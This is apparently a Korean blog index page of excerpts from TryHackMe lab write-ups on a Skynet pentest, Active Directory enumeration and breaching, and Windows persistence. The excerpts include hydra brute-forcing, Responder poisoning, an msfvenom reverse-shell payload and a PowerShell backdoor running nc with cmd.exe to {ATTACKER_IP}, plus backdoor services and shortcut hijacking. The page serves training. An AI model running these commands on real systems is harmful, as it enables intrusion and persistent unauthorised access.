본문 바로가기

Play/THM

Play/THM 2023. 10. 24. THM Offensive Pentesting - Skynet https://tryhackme.com/room/skynet gobuster dir -u http://10.10.83.54/ -w /usr/share/wordlists/dirb/common.txt hydra 10.10.83.54 -l milesdyson -P ./log1.txt http-post-form '/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:F=incorrect' -V smbclient //10.10.83.54/anonymous 10.10.83.54/squirrelmail milesdyson cyborg007haloterminator smbclient //10.10.83.54/milesdyson -U milesdys..
Enumerating Active Directory
Play/THM 2023. 10. 20. Enumerating Active Directory TASK 6. Enumeration through Bloodhound THM 링크 Bloodhound : AD 또는 Azure 환경 내 관계를 확인할 수 있음. (GitHub) - 공격자 : 복잡한 공격 경로를 쉽게 식별할 수 있음 - 방어자 : 공격 경로를 식별하고 제거할 수 있음 Sharphound : Bloodhound의 열거 툴로, Bloodhound에서 시각적으로 표시할 수 있는 AD정보를 열거하는데 사용 - Sharphound.ps1 : Sharphound 실행을 위한 Powershell 스크립트 (업데이트 중단). 스크립트를 메모리에 직접 로드하여 디스크 상 AV 스캔을 피할 수 있으므로 RAT과 함께 사용 권고 - Sharphound.exe : Windows 실행 파일 - AzureHoun..
Play/THM 2023. 10. 19. Enumerating Active Directory Enumerating Active Directory TryHackMe 링크 CMD net user /domain : AD 도메인의 모든 사용자 출력 net user /domain net group /domain : AD 도메인의 모든 그룹 출력 net group /domain net accounts /domain : AD 도메인의 패스워드 정책 출력 cmd을 사용한 AD 열거 장점 - 추가 도구가 필요하지 않으며, 이러한 간단한 명령어는 블루팀에서 모니터링하지 않는 경우가 많음 - 명령 실행을 위한 GUI 불필요 - 피싱 페이로드에 주로 사용되는 VBScript 및 기타 매크로 언어는 cmd 명령을 기본적으로 지원함. 구체적인 페이로드가 작성되기 전에 AD 도메인에 관한 정보 열거 가능 단점 - net ..
Breaching Active Directory (2)
Play/THM 2023. 10. 12. Breaching Active Directory (2) Task 5 Authentication Relays Responder 다운로드 링크 Responder는 IPv6/IPv4 LLMNR/NBT-NS/mDNS 포이즈너(Poisoner)로, 이를 통해 NetNTLM Challenge를 가로챌 수 있다. 로컬 네트워크 내 Challenge만 가능하며 현재 VPN을 통해 네트워크에 연결되어 있으므로 해당 VPN 네트워크에서 발생하는 인증 Challenge 타겟이된다. THM의 어택박스로 실습하니 왜인지 작동하지 않아서 VPN을 사용했다. [KALI VM] openvpn breachingad.ovpn 1) TryHackMe에서 제공하는 네트워크 VPN서버로,이것을 실행해준다 (링크) 2) ifconfig 3) Responder 다운 후 실행 responder -I ..
Breaching Active Directory (1)
Play/THM 2023. 9. 27. Breaching Active Directory (1) 랩실에서 실습하기 위한 사전 준비 [ATTACKBOX] systemd-resolve --interface breachad --set-dns {THMDC_IP} --set-domain za.tryhackme.com nslookup thmdc.za.tryhackme.com Task 4 LDAP Bind Credentials 애플리케이션이 사용할 수 있는 AD인증방법 4.1 NTLM - 시도-응답 기반 체계인 NetNTLM을 사용 - 애플리케이션이 사용자를 대신하여 인증, 애플리케이션 자체에서 직접 사용자를 인증하지 않음 - AD자격증명은 DC에만 저장 (애플리케이션에 저장X) 4.2 LDAP - 애플리케이션이 사용자의 자격 증명을 직접 확인함 - 애플리케이션은 AD 자격증명 쌍을 가지고 있음 (해당 쌍을 사..
Windows Local Persistence (3)
Play/THM 2023. 9. 25. Windows Local Persistence (3) TASK 4. 서비스 남용 4.1 Creating backdoor services 1) 리버스쉘 페이로드 만들기 msfvenom -p windows/x64/shell_reverse_tcp LHOST={ATTACKER_IP} LPORT=4448 -f exe-service -o rev-svc.exe * 포맷이 exe-service이다. 2) 가져오기 scp root@{ATTACKER_IP}:/root/rev-svc.exe c:\windows\ 3) nc 리스닝 4) 서비스 등록하기 sc.exe create THMservice2 binPath= "C:\windows\rev-svc.exe" start= auto sc.exe start THMservice2 4.2 Modifying existing services..
Windows Local Persistence (2)
Play/THM 2023. 9. 25. Windows Local Persistence (2) Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술 * 참고 : MITRE ATT&CK TASK 3 3.1 Executable Files 바탕화면에 calc.exe 바로가기가 있다고 가정 1) PS 스크립트 만들기 # C:\Windows\System32\backdoor.ps1 Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe {ATTACKER_IP} 4444" C:\Windows\System32\calc.exe 2) 바탕화면에 있는 calc.exe 바로가기의 Target 변경 # target # PowerShell 스크립트가 숨겨진 창에서 실행 powershell.exe -WindowStyle hidden C:\Windo..
Windows Local Persistence (1)
Play/THM 2023. 9. 25. Windows Local Persistence (1) Persistence : 침투 후 지속적으로 타겟에 접근할 수 있도록 하는 기술 * 참고 : MITRE ATT&CK TASK 2. 타 계정의 권한 조작 지속성을 얻는 가장 쉬운 방법은 "관리자의 크리덴셜을 얻는 것" 이다. 다만, 블루팀 측에서 탐지하기 어렵게 하기 위해, 타 계정을 조작하여 관리자의 권한을 부여하는 방법을 사용할 것이다. ※ 가정 : 타겟 컴퓨터의 패스워드 해시를 덤프, 계정의 비밀번호를 성공적으로 크랙함 (Administrator) ※ kali에서 타겟으로 접속할 때 evil-winrm 툴을 사용한다. evil-winrm -i {TARGET IP} -u user1 -p Password1234 2.1 Assign Group Memberships 2.1.1 administrators # ..

티스토리툴바